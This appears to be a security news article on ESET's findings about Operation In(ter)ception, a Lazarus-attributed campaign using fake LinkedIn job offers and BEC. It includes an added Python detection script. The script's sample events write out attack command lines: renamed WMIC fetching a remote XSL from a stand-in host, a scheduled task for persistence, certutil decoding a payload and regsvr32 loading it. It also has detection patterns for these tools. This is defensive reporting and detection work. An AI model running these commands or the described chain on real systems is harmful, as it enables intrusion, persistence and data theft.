The attackers were attempting to spy on key employees of the targeted organizations, and in some cases they also attempted to siphon money through business email compromise (BEC) attacks.
“At the end of last year, we discovered targeted attacks against aerospace and military companies in Europe and the Middle East, active from September to December 2019.” reads the analysis published by the experts. “A collaborative investigation with two of the affected European companies allowed us to gain insight into the operation and uncover previously undocumented malware.”
The campaign was active between September and December 2019; ESET researchers suspect the involvement of the North Korea-linked Lazarus APT group.
The activity of the Lazarus APT group (aka HIDDEN COBRA) surged in 2014 and 2015, and its members used mostly custom-tailored malware in their attacks. This threat actor has been active since at least 2009, possibly as early as 2007, and it has been involved in both cyber espionage campaigns and sabotage activities aimed at destroying data and disrupting systems.
The attackers created fake LinkedIn accounts posing as HR representatives of well-known companies in the aerospace and defense industries (e.g. Collins Aerospace and General Dynamics).
Threat actors used the fake profiles to send job offers to the target individuals through LinkedIn's messaging feature.
Attackers used documents related to the job offer as a lure.
“Once the contact was established, the attackers snuck malicious files into the communication, disguising them as documents related to the advertised job offer,” reads the report. “To send the malicious files, the attackers either used LinkedIn directly, or a combination of email and OneDrive. For the latter option, the attackers used fake email accounts corresponding with their fake LinkedIn personas, and included OneDrive links hosting the files.”
The attackers sent password-protected RAR archives that purportedly contained a PDF with salary details for the advertised positions; the PDF was only a decoy for the malicious LNK file inside the archive.
“The shared file was a password-protected RAR archive containing a LNK file. When opened, the LNK file started a Command Prompt that opened a remote PDF file in the target’s default browser. That PDF, seemingly containing salary information for the reputed job positions, in reality served as a decoy;” continues the report. “in the background, the Command Prompt created a new folder and copied the WMI Commandline Utility (WMIC.exe) to this folder, renaming the utility in the process. Finally, it created a scheduled task, set to execute a remote XSL script periodically via the copied WMIC.exe.”
Upon gaining an initial foothold inside the target company, the attackers used a custom downloader to fetch a previously undocumented second-stage C++ backdoor. The backdoor periodically sends requests to an attacker-controlled server and carries out predefined actions based on the commands it receives. It is also used to exfiltrate the collected data as a RAR archive via a modified version of dbxcli, an open-source command-line client for Dropbox.
Experts noticed that the attackers relied on living-off-the-land binaries throughout the chain: WMIC to interpret remote XSL scripts, certutil to decode base64-encoded downloaded payloads, and rundll32 and regsvr32 to run their custom malware. Because these are signed Windows utilities, hash-based blocking is ineffective, and detection has to key on how they are invoked.
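The chain described above (WMIC copied and renamed, a scheduled task that fetches a remote XSL, certutil decoding a payload, rundll32/regsvr32 launching it) leaves a recognisable pattern in process-creation telemetry. The Python below is an added example, not ESET's code or anything taken from the report: it runs a handful of heuristic rules over constructed Sysmon-style process events. Every path, task name, URL and file name in the sample events is invented for illustration and is not an indicator from the paper; the field names mirror what Sysmon Event ID 1 records.

```python
"""Rule-based detection for the living-off-the-land chain discussed above.

Added example; the events, paths, task name and URL are constructed
for illustration and are not indicators from ESET's report.
"""
import re
from dataclasses import dataclass
from typing import Callable, List, Tuple


@dataclass
class ProcEvent:
    image: str               # full path of the executable that started
    original_file_name: str  # OriginalFileName from the PE version resource
    command_line: str
    parent_image: str


def _basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


# Folders a standard user can write to; system binaries copied here are suspicious.
USER_WRITABLE = re.compile(
    r"\\(users\\[^\\]+\\(appdata|downloads)|programdata|windows\\temp)\\", re.I)
# WMIC's /format: switch pointed at an http(s) URL fetches and executes a remote XSL.
REMOTE_XSL = re.compile(r"/format:[\"']?https?://", re.I)


def renamed_wmic(e: ProcEvent) -> bool:
    """WMIC.exe running under another file name (OriginalFileName survives a rename)."""
    return e.original_file_name.lower() == "wmic.exe" and _basename(e.image) != "wmic.exe"


def wmic_remote_xsl(e: ProcEvent) -> bool:
    """WMIC, whatever it is called on disk, told to load a remote XSL stylesheet."""
    return e.original_file_name.lower() == "wmic.exe" and bool(REMOTE_XSL.search(e.command_line))


def schtasks_remote_xsl(e: ProcEvent) -> bool:
    """Scheduled task whose action pulls a remote XSL: the persistence step."""
    return (e.original_file_name.lower() == "schtasks.exe"
            and "/create" in e.command_line.lower()
            and bool(REMOTE_XSL.search(e.command_line)))


def certutil_decode(e: ProcEvent) -> bool:
    """certutil used to decode or fetch a payload instead of managing certificates."""
    return (e.original_file_name.lower() == "certutil.exe"
            and re.search(r"\s-(decode|decodehex|urlcache)\b", e.command_line, re.I) is not None)


def lolbin_from_user_path(e: ProcEvent) -> bool:
    """rundll32/regsvr32 loading a module that lives in a user-writable folder."""
    return (_basename(e.image) in ("rundll32.exe", "regsvr32.exe")
            and bool(USER_WRITABLE.search(e.command_line)))


RULES: List[Tuple[str, Callable[[ProcEvent], bool]]] = [
    ("renamed_wmic", renamed_wmic),
    ("wmic_remote_xsl", wmic_remote_xsl),
    ("schtasks_remote_xsl", schtasks_remote_xsl),
    ("certutil_decode", certutil_decode),
    ("lolbin_from_user_path", lolbin_from_user_path),
]


def scan(events: List[ProcEvent]) -> List[Tuple[int, str]]:
    """Return (event index, rule name) for every rule that fires, in event order."""
    return [(i, name) for i, ev in enumerate(events) for name, rule in RULES if rule(ev)]


# Constructed sample telemetry: two benign events and four steps of the chain.
SAMPLE_EVENTS = [
    # 0: benign inventory query from an admin console
    ProcEvent(r"C:\Windows\System32\wbem\WMIC.exe", "wmic.exe",
              r"wmic os get Caption,Version", r"C:\Windows\System32\cmd.exe"),
    # 1: WMIC copied to Temp under a new name and pointed at a remote XSL
    ProcEvent(r"C:\Users\alice\AppData\Local\Temp\upd\upd.exe", "wmic.exe",
              r'upd.exe os get /format:"https://files.example.invalid/u.xsl"',
              r"C:\Windows\System32\cmd.exe"),
    # 2: scheduled task re-running the renamed WMIC every 30 minutes
    ProcEvent(r"C:\Windows\System32\schtasks.exe", "schtasks.exe",
              r'schtasks /create /sc minute /mo 30 /tn Updater /tr "C:\Users\alice\AppData\Local\Temp\upd\upd.exe os get /format:https://files.example.invalid/u.xsl"',
              r"C:\Windows\System32\cmd.exe"),
    # 3: certutil decoding a base64 blob into a DLL
    ProcEvent(r"C:\Windows\System32\certutil.exe", "certutil.exe",
              r"certutil -decode C:\Users\alice\AppData\Local\Temp\p.txt C:\Users\alice\AppData\Local\Temp\p.dll",
              r"C:\Windows\System32\cmd.exe"),
    # 4: regsvr32 loading the decoded DLL from Temp
    ProcEvent(r"C:\Windows\System32\regsvr32.exe", "regsvr32.exe",
              r"regsvr32 /s C:\Users\alice\AppData\Local\Temp\p.dll",
              r"C:\Windows\System32\cmd.exe"),
    # 5: benign certutil use
    ProcEvent(r"C:\Windows\System32\certutil.exe", "certutil.exe",
              r"certutil -verify C:\Certs\server.cer", r"C:\Windows\System32\cmd.exe"),
]


if __name__ == "__main__":
    for idx, rule_name in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {rule_name} -> {SAMPLE_EVENTS[idx].command_line}")
```

The rules deliberately match on OriginalFileName rather than the on-disk name, because the copy-and-rename of WMIC.exe defeats any rule keyed on the image path alone; on a real estate you would tune the user-writable path list and whitelist known administrative scripts before alerting.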
ESET researchers also discovered that the threat actors behind Operation In(ter)ception attempted to use email accounts compromised at the targeted organizations to launch BEC attacks against other businesses.
The BEC attempts observed by ESET failed because the targeted customers contacted the compromised organizations directly to ask about the payment requests.
“First, leveraging existing communication in the victim’s emails, the attackers tried to manipulate a customer of the targeted company to pay a pending invoice to their bank account. For further communication with the customer, they used their own email address mimicking the victim’s.” continues the report.
“Here, the attackers were unsuccessful – rather than paying the invoice, the customer responded with inquiries about the requested sum. As the attackers urged the customer to pay, the customer ended up contacting the victim’s correct email address about the issue, raising an alarm on the victim’s side.”
Additional details on the attacks, including Indicators of Compromise (IoCs) and MITRE ATT&CK techniques, are reported in the paper published by the experts.
(SecurityAffairs – Operation In(ter)ception, hacking)